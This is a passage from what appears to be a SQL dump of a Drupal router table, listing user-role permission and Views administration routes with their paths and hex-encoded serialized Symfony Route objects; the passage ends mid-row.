('entity.user_role.edit_permissions_form', '/admin/people/permissions/{user_role}', '/admin/people/permissions/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f70656f706c652f7065726d697373696f6e732f7b757365725f726f6c657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34393a225c44727570616c5c757365725c466f726d5c557365725065726d697373696f6e73526f6c655370656369666963466f726d223b733a363a225f7469746c65223b733a393a224564697420726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31363a22757365725f726f6c652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35343a227b5e2f61646d696e2f70656f706c652f7065726d697373696f6e732f283f503c757365725f726f6c653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f70656f706c652f7065726d697373696f6e73223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32373a222f61646d696e2f70656f706c652f7065726d697373696f6e732f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.view.break_lock_form', '/admin/structure/views/view/{view}/break-lock', '/admin/structure/views/view/%/break-lock', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f627265616b2d6c6f636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31353a22766965772e627265616b5f6c6f636b223b733a363a225f7469746c65223b733a31303a22427265616b206c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31353a22766965772e627265616b2d6c6f636b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36333a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f627265616b5c2d6c6f636b247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f627265616b2d6c6f636b223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f7374727563747572652f76696577732f766965772f252f627265616b2d6c6f636b223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.collection', '/admin/structure/views', '/admin/structure/views', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f7374727563747572652f7669657773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a343a2276696577223b733a363a225f7469746c65223b733a353a225669657773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f7374727563747572652f7669657773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f7669657773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f7374727563747572652f7669657773223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.view.config_translation_overview', '/admin/structure/views/view/{view}/translate', '/admin/structure/views/view/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34343a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a343a2276696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36313a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f7374727563747572652f76696577732f766965772f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.delete_form', '/admin/structure/views/view/{view}/delete', '/admin/structure/views/view/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31313a22766965772e64656c657465223b733a363a225f7469746c65223b733a31313a2244656c6574652076696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35383a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33363a222f61646d696e2f7374727563747572652f76696577732f766965772f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.disable', '/admin/structure/views/view/{view}/disable', '/admin/structure/views/view/%/disable', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f64697361626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a616a61784f7065726174696f6e223b733a323a226f70223b733a373a2264697361626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31323a22766965772e64697361626c65223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35393a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f64697361626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f64697361626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f7374727563747572652f76696577732f766965772f252f64697361626c65223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.duplicate_form', '/admin/structure/views/view/{view}/duplicate', '/admin/structure/views/view/%/duplicate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34343a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f6475706c6963617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31343a22766965772e6475706c6963617465223b733a363a225f7469746c65223b733a31343a224475706c69636174652076696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31343a22766965772e6475706c6963617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36313a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f6475706c6963617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f6475706c6963617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f7374727563747572652f76696577732f766965772f252f6475706c6963617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.edit_display_form', '/admin/structure/views/view/{view}/edit/{display_id}', '/admin/structure/views/view/%/edit', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35323a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f656469742f7b646973706c61795f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a65646974223b733a31303a22646973706c61795f6964223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a333a7b733a393a2274656d7073746f7265223b623a313b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a35333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e76696577735f7569223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a31303a22646973706c61795f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38343a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f65646974283f3a2f283f503c646973706c61795f69643e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a22646973706c61795f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a31303a22646973706c61795f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7374727563747572652f76696577732f766965772f252f65646974223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.view.edit_form', '/admin/structure/views/view/{view}', '/admin/structure/views/view/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a65646974223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a333a7b733a393a2274656d7073746f7265223b623a313b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a35333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e76696577735f7569223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35313a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7374727563747572652f76696577732f766965772f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.view.enable', '/admin/structure/views/view/{view}/enable', '/admin/structure/views/view/%/enable', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f656e61626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c76696577735f75695c436f6e74726f6c6c65725c56696577735549436f6e74726f6c6c65723a3a616a61784f7065726174696f6e223b733a323a226f70223b733a363a22656e61626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31313a22766965772e656e61626c65223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2276696577223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35383a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f656e61626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f656e61626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2276696577223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33363a222f61646d696e2f7374727563747572652f76696577732f766965772f252f656e61626c65223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.view.preview_form', '/admin/structure/views/view/{view}/preview/{display_id}', '/admin/structure/views/view/%/preview', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35353a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f707265766965772f7b646973706c61795f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31323a22766965772e70726576696577223b733a31303a22646973706c61795f6964223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31363a2261646d696e6973746572207669657773223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a333a7b733a393a2274656d7073746f7265223b623a313b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a35333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e76696577735f7569223b7d7d733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a31303a22646973706c61795f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38373a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f